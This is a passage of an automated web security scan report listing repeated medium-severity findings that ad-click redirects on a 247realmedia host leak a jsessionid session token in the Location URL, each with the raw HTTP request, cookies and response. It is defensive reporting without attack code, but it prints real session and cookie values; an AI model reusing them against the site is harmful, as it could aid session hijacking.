  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121005439/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.13. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1220615232/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1220615232/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1220615232/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.14. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1239223334/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1239223334/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1239223334/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.15. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1297608231/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1297608231/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1297608231/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.16. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.17. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379666529/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379666529/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379666529/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.18. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1392092493/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1392092493/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1392092493/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.19. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1417680846/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1417680846/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1417680846/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.20. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1442210960/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1442210960/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1442210960/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.21. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.22. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1673101093/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1673101093/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1673101093/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.23. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:38:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.24. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1741696931/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1741696931/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1741696931/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.25. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1767100923/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1767100923/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1767100923/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.26. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790286706/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790286706/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790286706/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
